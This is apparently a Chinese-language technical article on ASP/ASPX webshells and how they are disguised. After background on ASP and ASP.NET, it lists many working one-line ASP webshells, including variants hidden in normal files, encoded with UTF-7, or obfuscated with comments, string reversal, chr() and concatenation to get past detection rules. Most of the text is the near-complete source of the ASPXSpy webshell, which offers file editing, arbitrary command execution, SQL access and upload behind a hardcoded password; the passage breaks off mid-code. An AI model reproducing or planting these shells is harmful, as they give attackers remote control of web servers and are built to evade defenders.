Deformity ASP/ASPX Webshell、Webshell Hidden Learning
catalog
0. Active Server Page(ASP) 1. ASP.NET 2. ASP WEBSHELL变形方式 3. ASPX WEBSHELL变形方式 4. webshell中常见的编码转换隐藏方式
0. Active Server Page(ASP)
ASP是动态服务器页面(Active Server Page),是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具。ASP的网页文件的格式是 .asp。现在常用于各种动态网站中
0x1: ASP脚本类型
微软的ASP语言经历了一个较长的发展周期,本质上是微软把PC上的脚本执行能力嵌入到了服务端(后来集成进了IIS)
1. VBScript: VB语言 1) ADO(ActiveX Data Object),这个组件使得程序对数据库的操作十分简单 2) COM+ 2. Javascript: 本质上说,Javascript并不是浏览器的专属语言,任何编译继承了Javascript Jit引擎的宿主程序都可以解释并运行Javascript代码,而IIS ASP就集成了Javascript引擎
Relevant Link:
https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspx https://en.wikipedia.org/wiki/Visual_Basic https://technet.microsoft.com/zh-cn/library/dn249912.aspx https://msdn.microsoft.com/en-us/mt173057.aspx https://technet.microsoft.com/zh-cn/library/bb978526.aspx https://technet.microsoft.com/zh-cn/library/hh849834.aspx http://baike.baidu.com/subview/2616/14622918.htm
1. ASP.NET
1. ASP.NET 是新一代的 ASP。它无法兼容经典 ASP,但 ASP.NET 可以引用 ASP 2. ASP.NET 页面需要编译,因此比经典 ASP 更快 3. ASP.NET 拥有更好的语言支持,大量用户控件,基于 XML 的组件,以及对用户认证的整合 4. ASP.NET 页面的扩展名是 .aspx,通常由 VB (Visual Basic) 或 C# (C sharp) 编写 5. ASP.NET 中的用户控件可以通过不同的语言进行编写,包括 C++ 和 Java 6. 当浏览器请求 ASP.NET 文件时,ASP.NET 引擎读取该文件,编译并执行文件中的脚本,然后以纯 HTML 向浏览器返回结果
0x1: ASP.NET脚本类型
ASP.NET支持使用以下几语言进行编程开发
1. Visual Basic (VB.NET) 2. C# (C sharp) 3. J# (Pronounced J sharp)
ASP.NET 是一个开发框架,用于通过 HTML、CSS、JavaScript 以及服务器脚本来构建网页和网站,ASP.NET 支持三种开发模式
1. Web Pages: 单页面模型 2. MVC: 模型视图控制器 3. Web Forms: 事件驱动模型
0x2: Web Pages(单页面模型)
Web Pages 是三种 ASP.NET 编程模型中的一种,用于创建 ASP.NET 网站和 web 应用程序, Web Pages 是最简单的 ASP.NET 网页开发编程模型。它提供了一种简单的方法将 HTML、CSS、JavaScript 以及服务器代码结合起来,Web Pages 通过可编程的 Web Helpers 进行扩展,包括数据库、视频、图像、社交网络等等
<html>
<body>
<h1>Hello Web Pages</h1>
<p>The time is @DateTime.Now</p>
</body>
</html>
0x3: ASP.NET MVC编程模型
MVC 是三个 ASP.NET 开发模型之一,MVC 是用于构建 web 应用程序的一种框架,使用 MVC (Model View Controller) 设计
1. Model(模型): 表示应用程序核心(比如数据库记录列表) 2. View(视图)对数据(数据库记录)进行显示 3. Controller(控制器)处理输入(写入数据库记录)
MVC 模型同时提供对 HTML、CSS 以及 JavaScript 的完整控制
Relevant Link:
http://www.w3school.com.cn/aspnet/webpages_intro.asp http://www.w3school.com.cn/aspnet/webpages_intro.asp http://www.w3school.com.cn/aspnet/ http://www.w3school.com.cn/aspnet/mvc_intro.asp http://www.w3school.com.cn/aspnet/aspnet_intro.asp
2. ASP变形方式
0x1: 一句话木马
<% execute request("op") %> <%execute request(chr(35))%> <% eval request("op") %> <%eval request.form("#")%> <%eval request.item("#")%> <%Eval(Request(chr(35)))%> password:# <%Eval(((Request(chr(35)))))%> 可以有多对括号
0x2: 正常文件插马
当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误
加入容错语句可以解决此问题
<% @Language="VBScript" %> <% Option Explicit On Error Resume Next execute request("op") Response.Buffer = True Dim nVar, strVar, i nVar = 10 strVar = "Hello World" For i=1 To nVar Response.Write strVar Response.Write "<br>" Next Response.End %>
或者使用eval代替execute
<% @Language="VBScript" %> <% Option Explicit eval request("op") Response.Buffer = True Dim nVar, strVar, i nVar = 10 strVar = "Hello World" For i=1 To nVar Response.Write strVar Response.Write "<br>" Next Response.End %>
0x3: 利用ASPASP Built-in Objects执行WEBSHELL
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language = "VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")
''密码: #
%>
下面逐段分析WEBSHELL代码的执行原理
1. ASP内置对象: server 创建Objects对象
The CreateObject method creates an instance of a server component. If the component has implemented the OnStartPage and OnEndPage methods, the OnStartPage method is called at this time.
CreateObject( progID ) //progID: Specifies the type of object to create. The format for progID is [Vendor.] Component[ .Version].
2. MSScriptControl.ScriptControl.1对象
Microsoft(R) Script 控件使用户可以创建运行任何 ActiveX(R) scripting 引擎,例如 Microsoft(R) Visual Basic (R) Scripting Edition 或Microsoft(R) JScript(TM) 的应用程序。用户可以将任何 Automation 对象的对象模型添加到 Script 控件中,这样该对象的方法和属性就可以为 scripting 引擎所使用。通过将某个应用程序的对象模型和某个scripting 引擎加以综合,用户就可以创建一个结合了两方面优点的 scripting 应用程序。应用程序不但具有 scripting 语言的简单化特点,而且综合了一种更高级、具有完整特性的专业应用程序的对象、方法,以及属性
Microsoft Script 控件可作为一个控件或者作为一个独立的 Automation 对象创建出来。该特性可以使得用任何语言书写的应用程序都可以用 ScriptControl 宿主任何兼容的 scripting 语言
3. 选择一种Scripting 语言
为 Script Control 配置正确的 scripting 语言。当在某页上作为控件创建 Script Control 时,Language 属性就被自动初始化为 "VBScript"。当作为一个 Automation 对象来创建 Script Control 时,则Language 属性留作未初始化的状态,而必须由代码作者对其进行设置,若要将 Language 属性设置为 JScript,可使用 Properties 窗口。用户也可以在代码中使用 Language 属性,如下所示
ScriptControl1.Language = "JScript" //其他 scripting 语言,例如 PERL 和 REXX,都不是由 Microsoft 所提供的,也可以为 Script 控件所用
4. Let host application to expose an object model to the script code
ms.AddObject "Response", Response ms.AddObject "request", request ms.AddObject "session", session ms.AddObject "server", server ms.AddObject "application", application
0x4: ExecuteGlobal执行WEBSHELL
<%ExecuteGlobal request(chr(35))%>
0x5: script标签中部署WEBSHELL代码
<script language=VBScript runat=server> if request(chr(35))<>"""" then ExecuteGlobal request(chr(35)) </script>
0x6: UTF7 WEBSHELL
<%@codepage=65000%> <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%> /* 解密后 <%@codepage=65000%> <%response.codepage=936:eval request("#")%> */
Relevant Link:
http://www.aspheute.com/english/20011123.asp https://msdn.microsoft.com/en-us/library/ms524786(v=vs.90).aspx https://msdn.microsoft.com/en-us/library/aa227633(v=vs.60).aspx http://www.jb51.net/article/53368.htm https://support.microsoft.com/en-us/kb/185697 https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx http://www.wpuniverse.com/vb/showthread.php?35313-ScriptControl-Another-Method-to-run-VBScript-Code
0x7: MS Script Encoder Decoded(VBScript)
1. VBScript 是微软公司出品的脚本语言,VBScript 是微软的编程语言 Visual Basic 的轻量级的版本,同时它也是ASP (Active Server Pages)默认使用的脚本语言 2. 将 <%@ language="language" %> 这一行写到 <html> 标签的上面,就可以使用另外一种脚本语言来编写子程序或者函数: /* <% @Language="VBScript" %> <% .. %> */
微软为ASP提供了一个Script Encoder工具,可以将ASP中的VBScript或JScript编码,让整个ASP脚本文件看起来像一个乱码文件,例如
<script language="VBScript.Encode"> #@~^KQAAAA==@#@&j1D bwYc214W,J3x1W[roPbdP1WW^ZZJ@#@&PQsAAA==^#~@</script>
Relevant Link:
http://ayra.ch/service/vbs/vbs.asp http://www.runoob.com/vbscript/vbscript-tutorial.html http://www.microsoft.com/china/vbscript/vbstutor/vbswhat.htm http://blog.miniasp.com/post/2008/03/19/ASP-VBScript-Encoding-Decoding-Tool-Script-Encoder.aspx
0x8: 通过变量传递外部参数执行WEBSHELL
<% a = request("op") eval(a) %>
另一种变量传递方式
<%if request ("1")<>""then session("1")=request("1"):end if:if session("1")<>"" then execute session("1")%>
0x9: Jscript编码WEBSHELL
<%@ Page Language="Jscript"%> <% eval(Request.Item["op"],"unsafe"); %>
注释符花代码绕过检测规则
<%@ Page Language = Jscript %> <%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/ "a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+ "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+ ","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -7 <%@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%> //密码是webadmin
Relevant Link:
http://www.jb51.net/article/11142.htm https://msdn.microsoft.com/en-us/library/aa260861(v=vs.60).aspx
0x10: 自定义编码函数绕过检测特征
StrReverse Replace加密,解密后为:Execute eval request("cmd")
<% Function decode(Code) decode=Replace(StrReverse(Code),"/*/","""") '函数名作为变量,表示要返回的数据。而且""""",表示只有一个双引号("""),只能用"""",其他都会报错 End Function Execute decode(")/*/dmc/*/(tseuqer lave") 'eval request(/*/cmd/*/) %> A
0x11: 利用chr ,request
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("1"))%>
0x12: 利用asp的&连接符
<% eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")") %>
0x13: 自定义命令执行函数
<script runat="server" language="JScript"> function popup(str) { var q = "u"; var w = "afe"; var a = q + "ns" + w; var b= eval(str,a); return(b); } </script> <% popup(popup(System.Text.Encoding.GetEncoding(65001). GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=)))); %>
3. ASPX WEBSHELL变形方式
对于ASPX.NET C# WEBSHELL来说,变形的方式较少,大多属于功能齐全的大马
0x1: aspxspy.aspx
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %> <%@ import Namespace="System.IO" %> <%@ import Namespace="System.Diagnostics" %> <%@ import Namespace="System.Data" %> <%@ import Namespace="System.Data.OleDb" %> <%@ import Namespace="Microsoft.Win32" %> <%@ import Namespace="System.Net.Sockets" %> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script runat="server"> /* Thanks Snailsor,FuYu Code by Bin Make in China Blog: http://www.rootkit.net.cn E-mail : [email protected] */ public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin public string SessionName = "ASPXSpy"; public string Bin_Action = ""; public string Bin_Request = ""; protected OleDbConnection conn = new OleDbConnection(); protected OleDbCommand comm = new OleDbCommand(); protected void Page_Load(object sender, EventArgs e) { if (Session[SessionName] != "BIN") { Bin_login(); } else { if (!IsPostBack) { Bin_main(); } else { Bin_Action = Request["goaction"]; if (Bin_Action == "del") { Bin_Request = Request["todo"]; Bin_Filedel(Bin_Request, 1); } if (Bin_Action == "change") { Bin_Request = Request["todo"]; Bin_FileList(Bin_Request); } if (Bin_Action == "deldir") { Bin_Request = Request["todo"]; Bin_Filedel(Bin_Request, 2); } if (Bin_Action == "down") { Bin_Request = Request["todo"]; Bin_Filedown(Bin_Request); } if (Bin_Action == "rename") { Bin_Request = Request["todo"]; Bin_FileRN(Bin_Request, 1); } if (Bin_Action == "renamedir") { Bin_Request = Request["todo"]; Bin_FileRN(Bin_Request, 2); } if (Bin_Action == "showatt") { Bin_Request = Request["todo"]; Bin_Fileatt(Bin_Request); } if (Bin_Action == "edit") { Bin_Request = Request["todo"]; Bin_FileEdit(Bin_Request); } if (Bin_Action == "postdata") { Bin_Request = Request["todo"]; Session["Bin_Table"] = Bin_Request; Bin_DataGrid.CurrentPageIndex = 0; Bin_DBstrTextBox.Text = ""; Bin_Databind(); } if (Bin_Action == "changedata") { Session["Bin_Table"] = null; Bin_Request = Request["todo"]; Session["Bin_Option"] = Request["intext"]; Bin_Change(); Bin_DBinfoLabel.Visible = false; Bin_DBstrTextBox.Text = Bin_Request; } if (Session["Bin_Table"] != null) { Bin_Databind(); } } } } public void Bin_login() { Bin_LoginPanel.Visible = true; Bin_MainPanel.Visible = false; Bin_MenuPanel.Visible = false; Bin_FilePanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_RegPanel.Visible = false; } public void Bin_main() { TimeLabel.Text = DateTime.Now.ToString(); Bin_PortPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_LoginPanel.Visible = false; Bin_MainPanel.Visible = true; Bin_MenuPanel.Visible = true; Bin_FilePanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>"; string HostName = "HostName : " + Environment.MachineName + "<br>"; string OS = "OS Version : " + Environment.OSVersion + "</br>"; string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>"; string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>"; InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>"; InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>"; InfoLabel.Text += Bin_Process() + "<hr>"; } private bool CheckIsNumber(string sSrc) { System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$"); if (reg.IsMatch(sSrc)) { return true; } else { return false; } } public string Bin_iisinfo() { string iisinfo = ""; string iisstart = ""; string iisend = ""; string iisstr = "IIS://localhost/W3SVC"; int i = 0; try { DirectoryEntry mydir = new DirectoryEntry(iisstr); iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"; foreach (DirectoryEntry child in mydir.Children) { if (CheckIsNumber(child.Name.ToString())) { string dirstr = child.Name.ToString(); string tmpstr = ""; DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr); DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir"); iisinfo += "<TR><TD align=center>" + (i = i + 1) + "</TD>"; iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>"; iisinfo += "<TD>" + child.Properties["ServerBindings"][0] + "</TD>"; iisinfo += "<TD><a href=javascript:Command('change','" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "');>" + newdir1.Properties["Path"].Value + "</a></TD>"; iisinfo += "</TR>"; } } iisend = "</TABLE><hr>"; } catch (Exception error) { Bin_Error(error.Message); } return iisstart + iisinfo + iisend; } public string Bin_Process() { string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>"; string prostr = ""; string htmlend = "</TR></TABLE>"; try { Process[] myprocess = Process.GetProcesses(); foreach (Process p in myprocess) { prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>"; prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>"; prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>"; prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>"; } } catch (Exception Error) { Bin_Error(Error.Message); } return htmlstr + prostr + htmlend; } protected void LoginButton_Click(object sender, EventArgs e) { string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower(); if (MD5Pass == Password) { Session[SessionName] = "BIN"; Bin_main(); } else { Bin_login(); } } protected void LogoutButton_Click(object sender, EventArgs e) { Session.Abandon(); Bin_login(); } protected void FileButton_Click(object sender, EventArgs e) { Bin_LoginPanel.Visible = false; Bin_MenuPanel.Visible = true; Bin_MainPanel.Visible = false; Bin_FilePanel.Visible = true; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_upTextBox.Text = formatpath(Server.MapPath(".")); Bin_CopyTextBox.Text = formatpath(Server.MapPath(".")); Bin_upTextBox.Text = formatpath(Server.MapPath(".")); Bin_FileList(Server.MapPath(".")); } protected void MainButton_Click(object sender, EventArgs e) { Bin_main(); } public void Bin_DriveList() { string file = "<input type=hidden name=goaction><input type=hidden name=todo>"; file += "<hr>Drives : "; string[] drivers = Directory.GetLogicalDrives(); for (int i = 0; i < drivers.Length; i++) { file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a> "; } file += " WebRoot : <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>"; Bin_FileLabel.Text = file; } public void Bin_FileList(string Bin_path) { Bin_FilePanel.Visible = true; Bin_CreateTextBox.Text = ""; Bin_CopytoTextBox.Text = ""; Bin_CopyTextBox.Text = Bin_path; Bin_upTextBox.Text = Bin_path; Bin_IISPanel.Visible = false; Bin_DriveList(); string tmpstr=""; string Bin_Filelist = Bin_FilelistLabel.Text; Bin_Filelist = "<hr>"; Bin_Filelist += "<table width=90% border=0 align=center>"; Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>"; Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>"; try { Bin_Filelist += "<tr><td>"; string parstr = ""; if (Bin_path.Length < 4) { parstr = formatpath(Bin_path); } else { parstr = formatpath(Directory.GetParent(Bin_path).ToString()); } Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|Parent Directory|</a></b></i>"; Bin_Filelist += "</td></tr>"; DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path); foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories()) { string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name); tmpstr += "<tr>"; tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i><dir></i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>Ren</a>|<a href=javascript:Command('showatt','" + foldername + "/');>Att</a>|<a href=javascript:Command('deldir','" + foldername + "');>Del</a></td>"; tmpstr += "</tr>"; } foreach (FileInfo Bin_file in Bin_dir.GetFiles()) { string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name); tmpstr += "<tr>"; tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>Edit</a>|<a href=javascript:Command('rename','" + filename + "');>Ren</a>|<a href=javascript:Command('down','" + filename + "');>Down</a>|<a href=javascript:Command('showatt','" + filename + "');>Att</a>|<a href=javascript:Command('del','" + filename + "');>Del</a></td>"; tmpstr += "</tr>"; } tmpstr += "</talbe>"; } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FilelistLabel.Text = Bin_Filelist + tmpstr; } public void Bin_Filedel(string instr,int type) { try { if (type == 1) { File.Delete(instr); } if (type == 2) { foreach (string tmp in Directory.GetFileSystemEntries(instr)) { if (File.Exists(tmp)) { File.Delete(tmp); } else { Bin_Filedel(tmp, 2); } } Directory.Delete(instr); } } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } public void Bin_FileRN(string instr,int type) { try { if (type == 1) { string[] array = instr.Split(','); File.Move(array[0], array[1]); } if (type == 2) { string[] array = instr.Split(','); Directory.Move(array[0], array[1]); } } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } public void Bin_Filedown(string instr) { try { FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read); long FileSize = MyFileStream.Length; byte[] Buffer = new byte[(int)FileSize]; MyFileStream.Read(Buffer, 0, (int)FileSize); MyFileStream.Close(); Response.AddHeader("Content-Disposition", "attachment;filename=" + instr); Response.Charset = "UTF-8"; Response.ContentType = "application/octet-stream"; Response.BinaryWrite(Buffer); Response.Flush(); Response.End(); } catch (Exception Error) { Bin_Error(Error.Message); } } public void Bin_Fileatt(string instr) { Bin_AttPanel.Visible = true; Bin_FilePanel.Visible = true; try { string Att = File.GetAttributes(instr).ToString(); Bin_ReadOnlyCheckBox.Checked = false; Bin_SystemCheckBox.Checked = false; Bin_HiddenCheckBox.Checked = false; Bin_ArchiveCheckBox.Checked = false; if (Att.LastIndexOf("ReadOnly") != -1) { Bin_ReadOnlyCheckBox.Checked = true; } if (Att.LastIndexOf("System") != -1) { Bin_SystemCheckBox.Checked = true; } if (Att.LastIndexOf("Hidden") != -1) { Bin_HiddenCheckBox.Checked = true; } if (Att.LastIndexOf("Archive") != -1) { Bin_ArchiveCheckBox.Checked = true; } Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString(); Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString(); Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString(); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_AttLabel.Text = instr; Session["FileName"] = instr; Bin_DriveList(); } public void Bin_FileEdit(string instr) { Bin_FilePanel.Visible = true; Bin_EditPanel.Visible = true; Bin_DriveList(); Bin_EditpathTextBox.Text = instr; StreamReader SR = new StreamReader(instr, Encoding.Default); Bin_EditTextBox.Text = SR.ReadToEnd(); SR.Close(); } protected void Bin_upButton_Click(object sender, EventArgs e) { string uppath = Bin_upTextBox.Text; if (uppath.Substring(uppath.Length - 1, 1) != @"/") { uppath = uppath + @"/"; } try { Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value)); } catch (Exception error) { Bin_Error(error.Message); } Bin_FileList(uppath); } public void Bin_Error(string error) { Bin_ErrorLabel.Text = "Error : " + error; } public string formatpath(string instr) { instr = instr.Replace(@"\", "/"); if (instr.Length < 4) { instr = instr.Replace(@"/", ""); } if (instr.Length == 2) { instr = instr + @"/"; } instr = instr.Replace(" ", "%20"); return instr; } public string formatfile(string instr) { instr = instr.Replace(" ", "%20"); return instr; } protected void Bin_GoButton_Click(object sender, EventArgs e) { Bin_FileList(Bin_upTextBox.Text); } protected void Bin_NewFileButton_Click(object sender, EventArgs e) { string newfile = Bin_CreateTextBox.Text; string filepath = Bin_upTextBox.Text; filepath = filepath + "/" + newfile; try { StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } protected void Bin_NewdirButton_Click(object sender, EventArgs e) { string dirpath = Bin_upTextBox.Text; string newdir = Bin_CreateTextBox.Text; newdir = dirpath + "/" + newdir; try { Directory.CreateDirectory(newdir); } catch(Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); } protected void Bin_CopyButton_Click(object sender, EventArgs e) { string copystr = Bin_CopyTextBox.Text; string copyto = Bin_CopytoTextBox.Text; try { File.Copy(copystr, copyto); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_CopytoTextBox.Text = ""; Bin_FileList(Bin_upTextBox.Text); } protected void Bin_CutButton_Click(object sender, EventArgs e) { string copystr = Bin_CopyTextBox.Text; string copyto = Bin_CopytoTextBox.Text; try { File.Move(copystr, copyto); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_CopytoTextBox.Text = ""; Bin_FileList(Bin_upTextBox.Text); } protected void Bin_SetButton_Click(object sender, EventArgs e) { try { string FileName = Session["FileName"].ToString(); File.SetAttributes(FileName, FileAttributes.Normal); if (Bin_ReadOnlyCheckBox.Checked) { File.SetAttributes(FileName, FileAttributes.ReadOnly); } if (Bin_SystemCheckBox.Checked) { File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System); } if (Bin_HiddenCheckBox.Checked) { File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden); } if (Bin_ArchiveCheckBox.Checked) { File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive); } if (FileName.Substring(FileName.Length - 1, 1) == "/") { Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text)); Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text)); Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text)); } else { File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text)); File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text)); File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text)); } } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); Response.Write("<script>alert('Success!')</sc" + "ript>"); } protected void Bin_EditButton_Click(object sender, EventArgs e) { try { StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default); SW.Write(Bin_EditTextBox.Text); SW.Close(); } catch (Exception Error) { Bin_Error(Error.Message); } Bin_FileList(Bin_upTextBox.Text); Response.Write("<script>alert('Success!')</sc" + "ript>"); } protected void Bin_BackButton_Click(object sender, EventArgs e) { Bin_FileList(Bin_upTextBox.Text); } protected void Bin_SbackButton_Click(object sender, EventArgs e) { Bin_FileList(Bin_upTextBox.Text); } protected void Bin_CmdButton_Click(object sender, EventArgs e) { Bin_MenuPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_CmdPanel.Visible = true; Bin_SQLPanel.Visible = false; Bin_CmdLabel.Text = ""; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = false; } protected void Bin_RunButton_Click(object sender, EventArgs e) { try { Process Cmdpro = new Process(); Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text; Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text; Cmdpro.StartInfo.UseShellExecute = false; Cmdpro.StartInfo.RedirectStandardInput = true; Cmdpro.StartInfo.RedirectStandardOutput = true; Cmdpro.StartInfo.RedirectStandardError = true; Cmdpro.Start(); string cmdstr = Cmdpro.StandardOutput.ReadToEnd(); cmdstr = cmdstr.Replace("<", "<"); cmdstr = cmdstr.Replace(">", ">"); Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>"; } catch (Exception Error) { Bin_Error(Error.Message); } } protected void Bin_SQLButton_Click(object sender, EventArgs e) { Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_MenuPanel.Visible = true; Bin_AccPanel.Visible = false; Bin_Scroll.Visible = false; Bin_DBmenuPanel.Visible = false; Bin_dirPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_RegPanel.Visible =false; } protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e) { Session["Bin_Table"] = null; Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB"; Bin_SQLRadioButton.Checked = true; Bin_AccRadioButton.Checked = false; Bin_AccPanel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; Bin_DBmenuPanel.Visible = false; Bin_dirPanel.Visible = false; } protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e) { Session["Bin_Table"] = null; Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb"; Bin_SQLRadioButton.Checked = false; Bin_AccRadioButton.Checked = true; Bin_DBmenuPanel.Visible = false; Bin_AccPanel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; Bin_dirPanel.Visible = false; } protected void OpenConnection() { if (conn.State == ConnectionState.Closed) { try { conn.ConnectionString = Bin_SQLconnTextBox.Text; comm.Connection = conn; conn.Open(); } catch (Exception Error) { Bin_Error(Error.Message); } } } protected void CloseConnection() { if (conn.State == ConnectionState.Open) conn.Close(); conn.Dispose(); comm.Dispose(); } public DataTable Bin_DataTable(string sqlstr) { OleDbDataAdapter da = new OleDbDataAdapter(); DataTable datatable = new DataTable(); try { OpenConnection(); comm.CommandType = CommandType.Text; comm.CommandText = sqlstr; da.SelectCommand = comm; da.Fill(datatable); } catch (Exception) { } finally { CloseConnection(); } return datatable; } protected void SQL_SumbitButton_Click(object sender, EventArgs e) { try { Session["Bin_Table"] = null; Bin_DataGrid.CurrentPageIndex = 0; Bin_DataGrid.AllowPaging = true; if 